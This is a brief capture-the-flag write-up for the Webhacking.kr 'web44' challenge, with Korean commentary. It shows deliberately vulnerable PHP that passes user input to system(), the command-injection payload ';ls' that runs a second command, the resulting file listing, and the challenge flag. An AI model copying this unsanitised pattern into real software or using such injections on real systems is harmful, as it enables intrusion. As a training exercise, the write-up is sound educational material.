Webhacking.kr - web44
web44
1
2
3
4
5
6
7
<?php
if($_POST['id']){
$id = $_POST['id'];
$id = substr($id,0,5);
system("echo 'hello! {$id}'"); // You just need to execute ls
}
?>
Solution
1
2
3
4
$id 값을 5글자 잘라내겠다고 함.
id=';ls' -> echo 'hello! ';ls''가 되서 ls 실행
-> hello! flag_29cbb98dafb4e471117fec409148e9386753569e index.php
-> FLAG{y2u.be/sW3RT0tF020}
This post is licensed under CC BY 4.0 by the author.